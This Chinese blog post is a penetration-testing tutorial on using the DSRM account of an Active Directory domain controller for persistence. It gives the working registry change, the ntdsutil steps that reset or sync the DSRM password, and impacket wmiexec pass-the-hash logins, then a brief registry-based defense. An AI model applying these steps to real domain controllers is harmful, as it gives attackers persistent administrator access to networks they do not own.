利用DSRM账号进行权限维持

1.前言

今天看了内网加固方面的知识,发现了一个加固方案是针对DSRM攻击的,于是就查了一下什么是DSRM攻击,因此有了这篇文章。

2.原理

域控上有个账户,名字为目录服务还原模式账户又名DSRM账户,它的密码是安装DC的时候设置的,一般不会修改。但是当DSRM账户被修改的时候,域控的本地管理员administrator账户密码的hash也会被修改,并且与DSRM账户的hash是一样的。这时候即使再次修改了本地管理员administrator账户的明文密码,sam文件的hash也不会更改,只会更改ntds.dit文件中的hash。

综上,意味着只要我们能够更改DSRM的账号密码,我们就能够通过DSRM的密码的hash登陆域控主机,并且即使域控主机的本地管理员密码改变了,管理员的hash也不会变,我们依旧可以利用pth攻击来登陆。

3.实现

3.1 更改DSRM明文密码

1.更改注册表:

reg add HKLM\System\CurrentControlSet\Control\Lsa  /v DsrmAdminLogonBehavior /t REG_DWORD /d 2

2.更改dsrm密码,以此输入一下命令。

ntdsutil
set dsrm password 
reset password on server null 
111 
111 
q 
q

在这里插入图片描述
3.在其他机器上利用impacket工具进行连接:

wmiexec.exe yukong/administrator:111@192.168.124.142  #yukong是hostname
wmiexec.exe -hashes :75f1d23f3a2527c6bfaada3e93b32a8b yukong/administrator@192.168.124.142

在这里插入图片描述

3.2 利用域内其他用户的hash去同步DSRM的密码

ntdsutil
set dsrm password 
sync from domain account zhangsan #可以将zhangsan改为其他任意用户的用户名
q 
q

上述命令会将域控的本地管理员账户的hash与明文同步为域内的zhangsan的明文hash。

4.防御方法

删除HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior键值。

参考文章

巧用DSRM密码同步将域控权限持久化
域渗透-权限维持之 DSRM

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 数字20 设计师:CSDN官方博客 返回首页